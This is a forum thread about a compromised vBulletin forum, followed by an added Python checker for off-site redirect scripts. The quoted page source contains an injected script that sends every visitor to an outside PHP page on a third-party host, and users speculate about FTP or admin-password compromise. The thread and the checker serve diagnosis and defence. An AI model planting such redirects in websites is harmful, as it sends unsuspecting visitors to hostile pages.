Looks as though the hacker is still logged on... as "admin"
The hack is at the server/code level rather than from within the forum software. Probably an FTP hack unless there's some sort of strange vBulletin vulnerability that allows you to insert code onto the server.
<title>Old Gold and Black Forums - Powered by vBulletin</title>
</head>
<body>
<!-- logo -->
<script type="text/javascript">
window.location = "http://phlebotomyguide.net/ww.php"
</script>
<a name="top"></a>
<!-- <table border="0" width="100%" cellpadding="0" cellspacing="0" align="center">
<tr>
<td align="center"><a href="index.php"><img src="images/misc/Logo.png" border="0" alt="Old Gold and Black Forums" /></a></td>
</tr>
</table> -->
<div style="text-align: center;"><a href="index.php"><img src="images/misc/Logo.png" border="0" alt="Old Gold and Black Forums" style="margin: 0 auto; padding: 0" /></a></div>
<!-- /logo -->
Yeah, that's where they stuck the JS hack. But if the admin password was weak or default, they likely got logged in to vBulletin as well. I've never seen "admin" listed as a logged-in user.
I think it's a vBulletin vulnerability... Look where the script appears in a page source:
I just assumed that "admin" had logged in because there was a problem with the site.
Yeah, but that would be easy enough to insert via FTP. I'm not sure if vBulletin really has much ability to insert code via its backend interface, but I haven't used it in a while.
I would honestly hope they don't use FTP to work on this site. Too insecure. Better to use SSL or SFTP... Oh well though.
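An added example, not part of the thread and not the site's own code: a Python check that scans a page's source for inline scripts that send the browser to another host, which is what the block after the logo comment in the quoted source does. The function name, the host `forum.example` and the sample page are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assignments or calls that navigate the whole page to a quoted URL.
REDIRECT_RE = re.compile(
    r"""\b(?:window\.|document\.|top\.|self\.)?location(?:\.href)?\s*"""
    r"""(?:=|\.(?:replace|assign)\s*\()\s*["']([^"']+)["']""",
    re.IGNORECASE,
)

class _InlineScripts(HTMLParser):
    """Collects (start_line, body) for every inline <script> block."""
    def __init__(self):
        super().__init__()
        self.scripts, self._in_script, self._line = [], False, 0
    def handle_starttag(self, tag, attrs):
        # Scripts loaded via src= have no inline body to inspect.
        if tag == "script" and "src" not in dict(attrs):
            self._in_script, self._line = True, self.getpos()[0]
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append((self._line, data))

def find_offsite_redirects(html, site_host):
    """Return [(line, url)] for inline scripts redirecting off site_host."""
    parser = _InlineScripts()
    parser.feed(html)
    parser.close()
    hits = []
    for line, body in parser.scripts:
        for url in REDIRECT_RE.findall(body):
            host = urlparse(url).hostname  # None for relative URLs
            if host and host.lower() != site_host.lower():
                hits.append((line, url))
    return hits

# Constructed sample modelled on the page source quoted in the thread.
SAMPLE = """<body>
<!-- logo -->
<script type="text/javascript">
window.location = "http://redirect.example/ww.php"
</script>
<script>window.location = "/index.php";</script>
</body>"""

if __name__ == "__main__":
    print(find_offsite_redirects(SAMPLE, "forum.example"))
```

Run against rendered pages or template files on a schedule, a non-empty result points at the line to inspect; it does not say how the script got there.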